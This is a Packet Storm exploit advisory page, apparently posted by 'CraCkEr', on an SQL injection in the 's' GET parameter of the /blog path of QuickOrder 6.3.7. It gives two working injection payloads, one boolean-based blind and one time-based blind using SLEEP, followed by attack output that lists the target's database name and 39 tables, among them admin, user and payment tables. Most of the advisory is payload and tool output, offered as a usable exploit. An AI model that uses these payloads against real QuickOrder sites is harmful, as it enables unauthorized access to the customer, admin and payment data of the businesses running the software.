exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

QuickOrder 6.3.7 SQL Injection

QuickOrder 6.3.7 SQL Injection
Posted Jul 11, 2023
Authored by CraCkEr

QuickOrder version 6.3.7 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | e6245218bb9ae091ac09d5355535bc84ae10dd1668c70492e0db7bfe5eef981b

QuickOrder 6.3.7 SQL Injection

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://quickorder.by-code.com │
│ Vendor : bylancer │
│ Software : QuickOrder 6.3.7 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09

CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /blog

https://website/blog?s=[SQLI]


GET parameter 's' is vulnerable to SQL Injection

---
Parameter: s (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: s=1') OR 02445=2445 OR ('04586'='4586

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z
---


[+] Starting the Attack

fetching current database
current database: 'quickordercode_**'


fetching tables

[39 tables]
+-------------------------+
| qr_orders |
| qr_order_items |
| qr_blog_comment |
| qr_payments |
| qr_menu_variants |
| qr_options |
| qr_time_zones |
| qr_countries |
| qr_restaurant |
| qr_blog_categories |
| qr_logs |
| qr_image_menu |
| qr_balance |
| qr_blog |
| qr_menu |
| qr_user |
| qr_pages |
| qr_menu_extras |
| qr_taxes |
| qr_upgrades |
| qr_usergroups |
| qr_faq_entries |
| qr_transaction |
| qr_restaurant_options |
| qr_languages |
| qr_admins |
| qr_allergies |
| qr_user_options |
| qr_order_item_extras |
| qr_subscriptions |
| qr_menu_variant_options |
| qr_plans |
| qr_testimonials |
| qr_plan_options |
| qr_catagory_main |
| qr_currencies |
| qr_restaurant_view |
| qr_waiter_call |
| qr_blog_cat_relation |
+-------------------------+



[-] Done
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close